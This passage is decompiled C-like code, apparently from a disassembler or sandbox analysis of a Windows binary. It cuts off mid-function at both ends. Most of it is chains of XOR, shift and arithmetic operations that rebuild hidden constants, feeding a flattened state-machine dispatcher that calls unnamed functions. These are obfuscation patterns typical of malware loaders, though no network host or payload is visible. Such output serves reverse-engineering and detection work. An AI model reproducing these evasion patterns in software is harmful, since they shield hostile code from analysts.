                                                                                                                                                                                                                    				_v620 = _v620 ^ 0x81ec4ccc;
                                                                                                                                                                                                                    				_v620 = _v620 >> 2;
                                                                                                                                                                                                                    				_v620 = _v620 ^ 0x2040ed79;
                                                                                                                                                                                                                    				_v596 = 0x2f359d;
                                                                                                                                                                                                                    				_v596 = _v596 + 0x6e42;
                                                                                                                                                                                                                    				_v596 = _v596 * 0x69;
                                                                                                                                                                                                                    				_v596 = _v596 + 0xffff4732;
                                                                                                                                                                                                                    				_v596 = _v596 ^ 0x138d352d;
                                                                                                                                                                                                                    				_v252 = 0xa95067;
                                                                                                                                                                                                                    				_v252 = _v252 / _t1246;
                                                                                                                                                                                                                    				_v252 = _v252 ^ 0x000018d3;
                                                                                                                                                                                                                    				_v192 = 0xdef02c;
                                                                                                                                                                                                                    				_v192 = _v192 ^ 0xe4ba4cab;
                                                                                                                                                                                                                    				_v192 = _v192 ^ 0xe461cc80;
                                                                                                                                                                                                                    				_v636 = 0xa16d71;
                                                                                                                                                                                                                    				_v636 = _v636 << 0xf;
                                                                                                                                                                                                                    				_v636 = _v636 | 0xfa37e9f3;
                                                                                                                                                                                                                    				_v636 = _v636 + 0x91ce;
                                                                                                                                                                                                                    				_v636 = _v636 ^ 0xfec61759;
                                                                                                                                                                                                                    				_v388 = 0x21ba23;
                                                                                                                                                                                                                    				_v388 = _v388 + 0xffffe2b1;
                                                                                                                                                                                                                    				_v388 = _v388 ^ 0x22d67414;
                                                                                                                                                                                                                    				_v388 = _v388 ^ 0x22fb76c5;
                                                                                                                                                                                                                    				_v300 = 0xdf9699;
                                                                                                                                                                                                                    				_t1247 = 0x3c;
                                                                                                                                                                                                                    				_v300 = _v300 / _t1247;
                                                                                                                                                                                                                    				_v300 = _v300 ^ 0x00027a88;
                                                                                                                                                                                                                    				_v352 = 0x426101;
                                                                                                                                                                                                                    				_v352 = _v352 >> 8;
                                                                                                                                                                                                                    				_v352 = _v352 + 0xb64f;
                                                                                                                                                                                                                    				_v352 = _v352 ^ 0x000cccb8;
                                                                                                                                                                                                                    				_v480 = 0x7834cb;
                                                                                                                                                                                                                    				_t1248 = 0x7a;
                                                                                                                                                                                                                    				_v480 = _v480 / _t1248;
                                                                                                                                                                                                                    				_v480 = _v480 >> 0xc;
                                                                                                                                                                                                                    				_v480 = _v480 << 0xa;
                                                                                                                                                                                                                    				_v480 = _v480 ^ 0x000276ba;
                                                                                                                                                                                                                    				_v404 = 0xb0e795;
                                                                                                                                                                                                                    				_v404 = _v404 | 0x0194d000;
                                                                                                                                                                                                                    				_t1249 = 0x60;
                                                                                                                                                                                                                    				_v404 = _v404 / _t1249;
                                                                                                                                                                                                                    				_v404 = _v404 ^ 0x000078f5;
                                                                                                                                                                                                                    				_v196 = 0x2fca10;
                                                                                                                                                                                                                    				_t1402 = 0x34;
                                                                                                                                                                                                                    				_v196 = _v196 / _t1402;
                                                                                                                                                                                                                    				_v196 = _v196 ^ 0x000ba0e5;
                                                                                                                                                                                                                    				_v556 = 0xaa7e10;
                                                                                                                                                                                                                    				_v556 = _v556 + 0x7368;
                                                                                                                                                                                                                    				_v556 = _v556 | 0x5a5da83e;
                                                                                                                                                                                                                    				_v556 = _v556 ^ 0x2c87d3e1;
                                                                                                                                                                                                                    				_v556 = _v556 ^ 0x767d72be;
                                                                                                                                                                                                                    				_v572 = 0xf4805;
                                                                                                                                                                                                                    				_v572 = _v572 + 0xffff139e;
                                                                                                                                                                                                                    				_v572 = _v572 ^ 0x838ee782;
                                                                                                                                                                                                                    				_t1250 = 0x2f;
                                                                                                                                                                                                                    				_v572 = _v572 / _t1250;
                                                                                                                                                                                                                    				_v572 = _v572 ^ 0x02cef174;
                                                                                                                                                                                                                    				_v524 = 0xc2c013;
                                                                                                                                                                                                                    				_t1251 = 0x47;
                                                                                                                                                                                                                    				_v524 = _v524 * 0x75;
                                                                                                                                                                                                                    				_v524 = _v524 >> 0xe;
                                                                                                                                                                                                                    				_v524 = _v524 >> 5;
                                                                                                                                                                                                                    				_v524 = _v524 ^ 0x0002d46d;
                                                                                                                                                                                                                    				_v428 = 0xf5592e;
                                                                                                                                                                                                                    				_v428 = _v428 << 4;
                                                                                                                                                                                                                    				_v428 = _v428 >> 2;
                                                                                                                                                                                                                    				_v428 = _v428 ^ 0x03d4bfd4;
                                                                                                                                                                                                                    				_v364 = 0x4dce47;
                                                                                                                                                                                                                    				_v364 = _v364 / _t1251;
                                                                                                                                                                                                                    				_t1252 = 0x70;
                                                                                                                                                                                                                    				_v364 = _v364 / _t1252;
                                                                                                                                                                                                                    				_v364 = _v364 ^ 0x00098639;
                                                                                                                                                                                                                    				_v564 = 0x81bdf6;
                                                                                                                                                                                                                    				_v564 = _v564 ^ 0xfdb174c9;
                                                                                                                                                                                                                    				_v564 = _v564 / _t1370;
                                                                                                                                                                                                                    				_v564 = _v564 + 0x3807;
                                                                                                                                                                                                                    				_v564 = _v564 ^ 0x025aa934;
                                                                                                                                                                                                                    				_v484 = 0xc952e;
                                                                                                                                                                                                                    				_v484 = _v484 | 0x558e694e;
                                                                                                                                                                                                                    				_v484 = _v484 >> 0xe;
                                                                                                                                                                                                                    				_t1253 = 0x21;
                                                                                                                                                                                                                    				_v484 = _v484 * 0x4e;
                                                                                                                                                                                                                    				_v484 = _v484 ^ 0x0061215a;
                                                                                                                                                                                                                    				_v284 = 0x7faf7d;
                                                                                                                                                                                                                    				_v284 = _v284 / _t1253;
                                                                                                                                                                                                                    				_v284 = _v284 ^ 0x000b56ed;
                                                                                                                                                                                                                    				_v204 = 0x600146;
                                                                                                                                                                                                                    				_t1254 = 0x56;
                                                                                                                                                                                                                    				_v204 = _v204 / _t1254;
                                                                                                                                                                                                                    				_v204 = _v204 ^ 0x0006f9bd;
                                                                                                                                                                                                                    				_v516 = 0x2540e6;
                                                                                                                                                                                                                    				_t354 =  &_v516; // 0x2540e6
                                                                                                                                                                                                                    				_t1371 = 6;
                                                                                                                                                                                                                    				_t1239 = 0x61;
                                                                                                                                                                                                                    				_v516 =  *_t354 * 0x1e;
                                                                                                                                                                                                                    				_v516 = _v516 << 7;
                                                                                                                                                                                                                    				_v516 = _v516 + 0xfc68;
                                                                                                                                                                                                                    				_v516 = _v516 ^ 0x2ecf1a85;
                                                                                                                                                                                                                    				_v220 = 0xc6968b;
                                                                                                                                                                                                                    				_v220 = _v220 << 3;
                                                                                                                                                                                                                    				_v220 = _v220 ^ 0x063de1c7;
                                                                                                                                                                                                                    				_v420 = 0x3caac7;
                                                                                                                                                                                                                    				_v420 = _v420 << 9;
                                                                                                                                                                                                                    				_v420 = _v420 ^ 0xb2f09953;
                                                                                                                                                                                                                    				_v420 = _v420 ^ 0xcba40e69;
                                                                                                                                                                                                                    				_v412 = 0xdea12a;
                                                                                                                                                                                                                    				_v412 = _v412 | 0xcd4eecdf;
                                                                                                                                                                                                                    				_v412 = _v412 << 2;
                                                                                                                                                                                                                    				_v412 = _v412 ^ 0x3777efb8;
                                                                                                                                                                                                                    				_v380 = 0x8e4fff;
                                                                                                                                                                                                                    				_v380 = _v380 << 2;
                                                                                                                                                                                                                    				_t1255 = 0x53;
                                                                                                                                                                                                                    				_v380 = _v380 * 0x34;
                                                                                                                                                                                                                    				_v380 = _v380 ^ 0x73abb9ab;
                                                                                                                                                                                                                    				_v276 = 0x1cfc9a;
                                                                                                                                                                                                                    				_v276 = _v276 >> 0x10;
                                                                                                                                                                                                                    				_v276 = _v276 ^ 0x000b3255;
                                                                                                                                                                                                                    				_v280 = 0xfe78b7;
                                                                                                                                                                                                                    				_v280 = _v280 >> 1;
                                                                                                                                                                                                                    				_v280 = _v280 ^ 0x007309c2;
                                                                                                                                                                                                                    				_v392 = 0xcd2598;
                                                                                                                                                                                                                    				_v392 = _v392 << 0xe;
                                                                                                                                                                                                                    				_v392 = _v392 >> 0x10;
                                                                                                                                                                                                                    				_v392 = _v392 ^ 0x000176d8;
                                                                                                                                                                                                                    				_v272 = 0xcbb948;
                                                                                                                                                                                                                    				_v272 = _v272 << 6;
                                                                                                                                                                                                                    				_v272 = _v272 ^ 0x32eee1e0;
                                                                                                                                                                                                                    				_v576 = 0x2c8190;
                                                                                                                                                                                                                    				_v576 = _v576 << 0xe;
                                                                                                                                                                                                                    				_v576 = _v576 / _t1371;
                                                                                                                                                                                                                    				_v576 = _v576 >> 8;
                                                                                                                                                                                                                    				_v576 = _v576 ^ 0x00075b01;
                                                                                                                                                                                                                    				_v424 = 0x307aee;
                                                                                                                                                                                                                    				_v424 = _v424 / _t1239;
                                                                                                                                                                                                                    				_v424 = _v424 ^ 0x361b696e;
                                                                                                                                                                                                                    				_v424 = _v424 ^ 0x361c10a7;
                                                                                                                                                                                                                    				_v416 = 0x976d7e;
                                                                                                                                                                                                                    				_v416 = _v416 / _t1255;
                                                                                                                                                                                                                    				_v416 = _v416 << 1;
                                                                                                                                                                                                                    				_v416 = _v416 ^ 0x000efcff;
                                                                                                                                                                                                                    				_v304 = 0x864547;
                                                                                                                                                                                                                    				_v304 = _v304 >> 7;
                                                                                                                                                                                                                    				_v304 = _v304 ^ 0x000db0f2;
                                                                                                                                                                                                                    				_v312 = 0x39b124;
                                                                                                                                                                                                                    				_t1256 = 0x23;
                                                                                                                                                                                                                    				_v312 = _v312 / _t1256;
                                                                                                                                                                                                                    				_v312 = _v312 ^ 0x000dff5d;
                                                                                                                                                                                                                    				_v400 = 0xa69ae8;
                                                                                                                                                                                                                    				_v400 = _v400 ^ 0x18aee1a2;
                                                                                                                                                                                                                    				_t1257 = 0x6f;
                                                                                                                                                                                                                    				_v400 = _v400 * 0x19;
                                                                                                                                                                                                                    				_v400 = _v400 ^ 0x58dce264;
                                                                                                                                                                                                                    				_v408 = 0x83ce6e;
                                                                                                                                                                                                                    				_v408 = _v408 / _t1257;
                                                                                                                                                                                                                    				_v408 = _v408 + 0xffff04c5;
                                                                                                                                                                                                                    				_v408 = _v408 ^ 0x000d723c;
                                                                                                                                                                                                                    				_v584 = 0xa9f086;
                                                                                                                                                                                                                    				_v584 = _v584 ^ 0x1f19f0d1;
                                                                                                                                                                                                                    				_t1258 = 0x38;
                                                                                                                                                                                                                    				_v584 = _v584 * 0x54;
                                                                                                                                                                                                                    				_v584 = _v584 + 0xfffff828;
                                                                                                                                                                                                                    				_v584 = _v584 ^ 0x65cb2c21;
                                                                                                                                                                                                                    				_v200 = 0x89ff99;
                                                                                                                                                                                                                    				_v200 = _v200 << 4;
                                                                                                                                                                                                                    				_v200 = _v200 ^ 0x089da5ec;
                                                                                                                                                                                                                    				_v612 = 0xcd230d;
                                                                                                                                                                                                                    				_v612 = _v612 * 0xa;
                                                                                                                                                                                                                    				_v612 = _v612 * 0x59;
                                                                                                                                                                                                                    				_v612 = _v612 ^ 0x0e9ea055;
                                                                                                                                                                                                                    				_v612 = _v612 ^ 0xc7bb50f4;
                                                                                                                                                                                                                    				_v292 = 0x2d684a;
                                                                                                                                                                                                                    				_v292 = _v292 * 0x25;
                                                                                                                                                                                                                    				_v292 = _v292 ^ 0x06915456;
                                                                                                                                                                                                                    				_v228 = 0x4f5e7f;
                                                                                                                                                                                                                    				_v228 = _v228 / _t1258;
                                                                                                                                                                                                                    				_v228 = _v228 ^ 0x00009284;
                                                                                                                                                                                                                    				_v208 = 0x7100cb;
                                                                                                                                                                                                                    				_v208 = _v208 >> 9;
                                                                                                                                                                                                                    				_v208 = _v208 ^ 0x00016cf1;
                                                                                                                                                                                                                    				_v436 = 0x597fd4;
                                                                                                                                                                                                                    				_v436 = _v436 ^ 0xcd7d3d97;
                                                                                                                                                                                                                    				_v436 = _v436 << 3;
                                                                                                                                                                                                                    				_v436 = _v436 ^ 0x69259576;
                                                                                                                                                                                                                    				_v216 = 0x2d3143;
                                                                                                                                                                                                                    				_v216 = _v216 >> 6;
                                                                                                                                                                                                                    				_v216 = _v216 ^ 0x00013df4;
                                                                                                                                                                                                                    				_v492 = 0x16418d;
                                                                                                                                                                                                                    				_v492 = _v492 * 0x1c;
                                                                                                                                                                                                                    				_v492 = _v492 << 2;
                                                                                                                                                                                                                    				_v492 = _v492 << 0xc;
                                                                                                                                                                                                                    				_v492 = _v492 ^ 0xcad5ea22;
                                                                                                                                                                                                                    				_v324 = 0x49139c;
                                                                                                                                                                                                                    				_v324 = _v324 << 0xb;
                                                                                                                                                                                                                    				_v324 = _v324 ^ 0x4897b17a;
                                                                                                                                                                                                                    				_v244 = 0xba0c42;
                                                                                                                                                                                                                    				_v244 = _v244 << 9;
                                                                                                                                                                                                                    				_v244 = _v244 ^ 0x741322b1;
                                                                                                                                                                                                                    				_v548 = 0xa012d7;
                                                                                                                                                                                                                    				_v548 = _v548 ^ 0x44b2f85c;
                                                                                                                                                                                                                    				_v548 = _v548 + 0xffffff2d;
                                                                                                                                                                                                                    				_v548 = _v548 + 0xffff478c;
                                                                                                                                                                                                                    				_v548 = _v548 ^ 0x441427b6;
                                                                                                                                                                                                                    				_v628 = 0xa9defd;
                                                                                                                                                                                                                    				_v628 = _v628 + 0xffffbff1;
                                                                                                                                                                                                                    				_v628 = _v628 >> 1;
                                                                                                                                                                                                                    				_v628 = _v628 + 0xea7d;
                                                                                                                                                                                                                    				_v628 = _v628 ^ 0x00532656;
                                                                                                                                                                                                                    				_v452 = 0x65e4d9;
                                                                                                                                                                                                                    				_v452 = _v452 * 0x56;
                                                                                                                                                                                                                    				_v452 = _v452 >> 3;
                                                                                                                                                                                                                    				_v452 = _v452 ^ 0x044d0691;
                                                                                                                                                                                                                    				_v604 = 0x44988f;
                                                                                                                                                                                                                    				_v604 = _v604 >> 4;
                                                                                                                                                                                                                    				_v604 = _v604 ^ 0x76185928;
                                                                                                                                                                                                                    				_v604 = _v604 << 2;
                                                                                                                                                                                                                    				_v604 = _v604 ^ 0xd87b5a37;
                                                                                                                                                                                                                    				_v316 = 0x40f8a4;
                                                                                                                                                                                                                    				_v316 = _v316 / _t1258;
                                                                                                                                                                                                                    				_v316 = _v316 ^ 0x000568d6;
                                                                                                                                                                                                                    				_v540 = 0x9caa74;
                                                                                                                                                                                                                    				_v540 = _v540 << 7;
                                                                                                                                                                                                                    				_v540 = _v540 | 0xc893abec;
                                                                                                                                                                                                                    				_v540 = _v540 >> 8;
                                                                                                                                                                                                                    				_v540 = _v540 ^ 0x00c40d9b;
                                                                                                                                                                                                                    				_v340 = 0x3852c0;
                                                                                                                                                                                                                    				_v340 = _v340 + 0xffffa293;
                                                                                                                                                                                                                    				_v340 = _v340 ^ 0x003a7279;
                                                                                                                                                                                                                    				_v396 = 0xfd1e6b;
                                                                                                                                                                                                                    				_v396 = _v396 | 0xd7f5bf0f;
                                                                                                                                                                                                                    				_v396 = _v396 ^ 0xd7f7c2a2;
                                                                                                                                                                                                                    				_v236 = 0x746fda;
                                                                                                                                                                                                                    				_v236 = _v236 ^ 0xb5436811;
                                                                                                                                                                                                                    				_v236 = _v236 ^ 0xb53c59be;
                                                                                                                                                                                                                    				_v544 = 0x567835;
                                                                                                                                                                                                                    				_v544 = _v544 + 0xd227;
                                                                                                                                                                                                                    				_v544 = _v544 ^ 0x300ae3dd;
                                                                                                                                                                                                                    				_t1259 = 0x65;
                                                                                                                                                                                                                    				_v544 = _v544 * 9;
                                                                                                                                                                                                                    				_v544 = _v544 ^ 0xb34bffa1;
                                                                                                                                                                                                                    				_v376 = 0xc36f4c;
                                                                                                                                                                                                                    				_v376 = _v376 / _t1259;
                                                                                                                                                                                                                    				_v376 = _v376 | 0xbdbd28c9;
                                                                                                                                                                                                                    				_v376 = _v376 ^ 0xbdbce36a;
                                                                                                                                                                                                                    				_v384 = 0x92ced3;
                                                                                                                                                                                                                    				_v384 = _v384 ^ 0xdbf1b9e5;
                                                                                                                                                                                                                    				_v384 = _v384 ^ 0x84ca47d6;
                                                                                                                                                                                                                    				_v384 = _v384 ^ 0x5fa8f099;
                                                                                                                                                                                                                    				_v528 = 0x51afb7;
                                                                                                                                                                                                                    				_v528 = _v528 * 0x79;
                                                                                                                                                                                                                    				_v528 = _v528 + 0xffffae05;
                                                                                                                                                                                                                    				_v528 = _v528 | 0xf8a8a318;
                                                                                                                                                                                                                    				_v528 = _v528 ^ 0xfebf26c4;
                                                                                                                                                                                                                    				_v368 = 0x2969f9;
                                                                                                                                                                                                                    				_v368 = _v368 ^ 0x61059908;
                                                                                                                                                                                                                    				_v368 = _v368 | 0x31ab7376;
                                                                                                                                                                                                                    				_v368 = _v368 ^ 0x71a3f0a9;
                                                                                                                                                                                                                    				_v264 = 0xefdd8c;
                                                                                                                                                                                                                    				_v264 = _v264 << 2;
                                                                                                                                                                                                                    				_v264 = _v264 ^ 0x03b6a483;
                                                                                                                                                                                                                    				_v512 = 0xfa2e89;
                                                                                                                                                                                                                    				_v512 = _v512 * 7;
                                                                                                                                                                                                                    				_v512 = _v512 + 0xffffd667;
                                                                                                                                                                                                                    				_v512 = _v512 + 0x3c71;
                                                                                                                                                                                                                    				_v512 = _v512 ^ 0x06df59ff;
                                                                                                                                                                                                                    				_v520 = 0xa9c9dc;
                                                                                                                                                                                                                    				_v520 = _v520 + 0xf15f;
                                                                                                                                                                                                                    				_v520 = _v520 | 0xc3788383;
                                                                                                                                                                                                                    				_v520 = _v520 << 0x10;
                                                                                                                                                                                                                    				_v520 = _v520 ^ 0xbbbb22a4;
                                                                                                                                                                                                                    				_v240 = 0xe15ca8;
                                                                                                                                                                                                                    				_v240 = _v240 ^ 0xa4a700f9;
                                                                                                                                                                                                                    				_v240 = _v240 ^ 0xa441dbe2;
                                                                                                                                                                                                                    				_v296 = 0x24d200;
                                                                                                                                                                                                                    				_v296 = _v296 + 0x9e74;
                                                                                                                                                                                                                    				_v296 = _v296 ^ 0x002813d4;
                                                                                                                                                                                                                    				_v288 = 0x8f1495;
                                                                                                                                                                                                                    				_v288 = _v288 + 0xd7f3;
                                                                                                                                                                                                                    				_v288 = _v288 ^ 0x0084d4e7;
                                                                                                                                                                                                                    				_v320 = 0x7de3c7;
                                                                                                                                                                                                                    				_v320 = _v320 << 0xa;
                                                                                                                                                                                                                    				_v320 = _v320 ^ 0xf783c3fc;
                                                                                                                                                                                                                    				_v328 = 0x1e28ab;
                                                                                                                                                                                                                    				_t1260 = 0x19;
                                                                                                                                                                                                                    				_v328 = _v328 / _t1260;
                                                                                                                                                                                                                    				_v328 = _v328 ^ 0x000643e4;
                                                                                                                                                                                                                    				_v592 = 0x142bb8;
                                                                                                                                                                                                                    				_t1261 = 0x1a;
                                                                                                                                                                                                                    				_v592 = _v592 / _t1261;
                                                                                                                                                                                                                    				_v592 = _v592 >> 0xa;
                                                                                                                                                                                                                    				_v592 = _v592 ^ 0xdd8e2ddd;
                                                                                                                                                                                                                    				_v592 = _v592 ^ 0xdd8f0ca0;
                                                                                                                                                                                                                    				_v336 = 0xec8606;
                                                                                                                                                                                                                    				_v336 = _v336 / _t1402;
                                                                                                                                                                                                                    				_v336 = _v336 ^ 0x0002df8e;
                                                                                                                                                                                                                    				_v500 = 0x759930;
                                                                                                                                                                                                                    				_t1262 = 0x72;
                                                                                                                                                                                                                    				_v500 = _v500 / _t1262;
                                                                                                                                                                                                                    				_v500 = _v500 + 0x17e7;
                                                                                                                                                                                                                    				_v500 = _v500 + 0x642f;
                                                                                                                                                                                                                    				_v500 = _v500 ^ 0x00086dc8;
                                                                                                                                                                                                                    				_v588 = 0x107ef;
                                                                                                                                                                                                                    				_v588 = _v588 / _t1371;
                                                                                                                                                                                                                    				_v588 = _v588 << 0xd;
                                                                                                                                                                                                                    				_v588 = _v588 | 0xad1da3b1;
                                                                                                                                                                                                                    				_v588 = _v588 ^ 0xad713d4a;
                                                                                                                                                                                                                    				_v532 = 0xed0e17;
                                                                                                                                                                                                                    				_v532 = _v532 ^ 0xa6db8a54;
                                                                                                                                                                                                                    				_v532 = _v532 >> 8;
                                                                                                                                                                                                                    				_v532 = _v532 + 0xb9bf;
                                                                                                                                                                                                                    				_v532 = _v532 ^ 0x00ab4ebc;
                                                                                                                                                                                                                    				_v356 = 0xbc29bf;
                                                                                                                                                                                                                    				_v356 = _v356 | 0xad901627;
                                                                                                                                                                                                                    				_v356 = _v356 ^ 0xa265e437;
                                                                                                                                                                                                                    				_v356 = _v356 ^ 0x0fd08dca;
                                                                                                                                                                                                                    				_v624 = 0x65ec2c;
                                                                                                                                                                                                                    				_v624 = _v624 >> 6;
                                                                                                                                                                                                                    				_v624 = _v624 ^ 0x31e8b4f8;
                                                                                                                                                                                                                    				_v624 = _v624 + 0xffffd410;
                                                                                                                                                                                                                    				_v624 = _v624 ^ 0x31e31bd6;
                                                                                                                                                                                                                    				_v632 = 0xa6d516;
                                                                                                                                                                                                                    				_v632 = _v632 + 0xffffb4b5;
                                                                                                                                                                                                                    				_v632 = _v632 << 0xd;
                                                                                                                                                                                                                    				_t1263 = 0xb;
                                                                                                                                                                                                                    				_v632 = _v632 / _t1263;
                                                                                                                                                                                                                    				_v632 = _v632 ^ 0x130c5b75;
                                                                                                                                                                                                                    				_v212 = 0xd827a9;
                                                                                                                                                                                                                    				_v212 = _v212 + 0xffffe5c3;
                                                                                                                                                                                                                    				_v212 = _v212 ^ 0x00d60410;
                                                                                                                                                                                                                    				_v616 = 0x9d7c85;
                                                                                                                                                                                                                    				_t1264 = 0x4b;
                                                                                                                                                                                                                    				_v616 = _v616 / _t1264;
                                                                                                                                                                                                                    				_v616 = _v616 >> 2;
                                                                                                                                                                                                                    				_v616 = _v616 + 0x5919;
                                                                                                                                                                                                                    				_v616 = _v616 ^ 0x00054929;
                                                                                                                                                                                                                    				_v260 = 0x6f16d2;
                                                                                                                                                                                                                    				_t1265 = 0x6d;
                                                                                                                                                                                                                    				_v260 = _v260 / _t1265;
                                                                                                                                                                                                                    				_v260 = _v260 ^ 0x0001becb;
                                                                                                                                                                                                                    				_v472 = 0x1826d7;
                                                                                                                                                                                                                    				_v472 = _v472 | 0x904dcf00;
                                                                                                                                                                                                                    				_v472 = _v472 + 0xe861;
                                                                                                                                                                                                                    				_v472 = _v472 ^ 0xf3a1510d;
                                                                                                                                                                                                                    				_v472 = _v472 ^ 0x63f74d6a;
                                                                                                                                                                                                                    				_v488 = 0xd58f33;
                                                                                                                                                                                                                    				_v488 = _v488 + 0xffff4ba3;
                                                                                                                                                                                                                    				_v488 = _v488 + 0xffff7c64;
                                                                                                                                                                                                                    				_v488 = _v488 ^ 0xdc985e74;
                                                                                                                                                                                                                    				_v488 = _v488 ^ 0xdc45c9d6;
                                                                                                                                                                                                                    				_v456 = 0x79fa18;
                                                                                                                                                                                                                    				_v456 = _v456 + 0xffff231a;
                                                                                                                                                                                                                    				_t1266 = 0x6b;
                                                                                                                                                                                                                    				_v456 = _v456 / _t1266;
                                                                                                                                                                                                                    				_v456 = _v456 ^ 0x0135446e;
                                                                                                                                                                                                                    				_v468 = 0x29c9d9;
                                                                                                                                                                                                                    				_v468 = _v468 / _t1239;
                                                                                                                                                                                                                    				_v468 = _v468 << 9;
                                                                                                                                                                                                                    				_v468 = _v468 ^ 0x00dcb510;
                                                                                                                                                                                                                    				_v332 = 0x66466b;
                                                                                                                                                                                                                    				_v332 = _v332 << 1;
                                                                                                                                                                                                                    				_v332 = _v332 ^ 0x00cc8cd7;
                                                                                                                                                                                                                    				_v568 = 0x7c0de2;
                                                                                                                                                                                                                    				_v568 = _v568 + 0xffff4caf;
                                                                                                                                                                                                                    				_v568 = _v568 + 0xffff5625;
                                                                                                                                                                                                                    				_t1267 = 0x67;
                                                                                                                                                                                                                    				_v568 = _v568 / _t1267;
                                                                                                                                                                                                                    				_v568 = _v568 ^ 0x00013f50;
                                                                                                                                                                                                                    				_v560 = 0x73ff57;
                                                                                                                                                                                                                    				_v560 = _v560 ^ 0xb746c150;
                                                                                                                                                                                                                    				_v560 = _v560 << 6;
                                                                                                                                                                                                                    				_v560 = _v560 >> 4;
                                                                                                                                                                                                                    				_v560 = _v560 ^ 0x0cd4e75c;
                                                                                                                                                                                                                    				_v444 = 0xde7d9e;
                                                                                                                                                                                                                    				_v444 = _v444 | 0xc311938f;
                                                                                                                                                                                                                    				_t1268 = 0x55;
                                                                                                                                                                                                                    				_v444 = _v444 / _t1268;
                                                                                                                                                                                                                    				_v444 = _v444 ^ 0x0240564c;
                                                                                                                                                                                                                    				_v256 = 0xf4ef75;
                                                                                                                                                                                                                    				_v256 = _v256 * 0x65;
                                                                                                                                                                                                                    				_v256 = _v256 ^ 0x60afc289;
                                                                                                                                                                                                                    				_v476 = 0xccdbb1;
                                                                                                                                                                                                                    				_v476 = _v476 >> 0xe;
                                                                                                                                                                                                                    				_v476 = _v476 >> 6;
                                                                                                                                                                                                                    				_v476 = _v476 >> 4;
                                                                                                                                                                                                                    				_v476 = _v476 ^ 0x000ef420;
                                                                                                                                                                                                                    				_v248 = 0x96788f;
                                                                                                                                                                                                                    				_v248 = _v248 * 0x49;
                                                                                                                                                                                                                    				_v248 = _v248 ^ 0x2ae694e7;
                                                                                                                                                                                                                    				_v232 = 0x92cdd7;
                                                                                                                                                                                                                    				_v232 = _v232 << 5;
                                                                                                                                                                                                                    				_v232 = _v232 ^ 0x1259cfd0;
                                                                                                                                                                                                                    				_v224 = 0xcaaa4a;
                                                                                                                                                                                                                    				_v224 = _v224 + 0xd1fc;
                                                                                                                                                                                                                    				_v224 = _v224 ^ 0x00cb9626;
                                                                                                                                                                                                                    				goto L1;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                    						L1:
                                                                                                                                                                                                                    						_t1411 = _t1379 - 0x882e236;
                                                                                                                                                                                                                    						if(_t1411 <= 0) {
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						L2:
                                                                                                                                                                                                                    						if(_t1411 == 0) {
                                                                                                                                                                                                                    							_t1168 = E00A6F443();
                                                                                                                                                                                                                    							_t1379 = 0x4fe0477;
                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                    								L1:
                                                                                                                                                                                                                    								_t1411 = _t1379 - 0x882e236;
                                                                                                                                                                                                                    								if(_t1411 <= 0) {
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								goto L2;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						_t1412 = _t1379 - 0x3a03f3e;
                                                                                                                                                                                                                    						if(_t1412 > 0) {
                                                                                                                                                                                                                    							__eflags = _t1379 - 0x5ea99a4;
                                                                                                                                                                                                                    							if(__eflags > 0) {
                                                                                                                                                                                                                    								__eflags = _t1379 - 0x71f92c4;
                                                                                                                                                                                                                    								if(_t1379 == 0x71f92c4) {
                                                                                                                                                                                                                    									_t1379 = 0x81cf865;
                                                                                                                                                                                                                    									while(1) {
                                                                                                                                                                                                                    										L1:
                                                                                                                                                                                                                    										_t1411 = _t1379 - 0x882e236;
                                                                                                                                                                                                                    										if(_t1411 <= 0) {
                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                    										goto L52;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    									goto L2;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								__eflags = _t1379 - 0x78be092;
                                                                                                                                                                                                                    								if(_t1379 == 0x78be092) {
                                                                                                                                                                                                                    									_t1168 = E00A6EBA2();
                                                                                                                                                                                                                    									_t1379 = 0x7f22995;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								__eflags = _t1379 - 0x7f22995;
                                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                                    									_v176 = E00A7A586(_v572, __eflags, _v524, _v428, 0xa61000);
                                                                                                                                                                                                                    									_v184 = E00A7A586(_v364, __eflags, _v564, _v484, 0xa61060);
                                                                                                                                                                                                                    									_t1192 = E00A7E31F( &_v176, _v284,  &_v184, _v204);
                                                                                                                                                                                                                    									asm("sbb esi, esi");
                                                                                                                                                                                                                    									_t1379 = ( ~_t1192 & 0x0ad23543) + 0x11bf7c7;
                                                                                                                                                                                                                    									E00A7D6DF(_v516, _v184, _v220, _v420);
                                                                                                                                                                                                                    									_t1272 = _v412;
                                                                                                                                                                                                                    									_t1168 = E00A7D6DF(_t1272, _v176, _v380, _v276);
                                                                                                                                                                                                                    									_t1407 = _t1407 + 0x30;
                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								__eflags = _t1379 - 0x81cf865;
                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								_t1168 = E00A7911D(_t1272, __eflags);
                                                                                                                                                                                                                    								__eflags = _t1168;
                                                                                                                                                                                                                    								if(_t1168 == 0) {
                                                                                                                                                                                                                    									L115:
                                                                                                                                                                                                                    									return _t1168;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    								_t1379 = 0xa3883f5;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                                    								_t1168 = E00A71DC8(_v292,  &_v80, _v228);
                                                                                                                                                                                                                    								_pop(_t1272);
                                                                                                                                                                                                                    								_t1379 = 0x545f5ee;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							__eflags = _t1379 - 0x3e64a7d;
                                                                                                                                                                                                                    							if(_t1379 == 0x3e64a7d) {
                                                                                                                                                                                                                    								_t1168 = E00A6E39B(_t1272);
                                                                                                                                                                                                                    								goto L115;
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    							__eflags = _t1379 - 0x4fe0477;
                                                                                                                                                                                                                    							if(_t1379 == 0x4fe0477) {
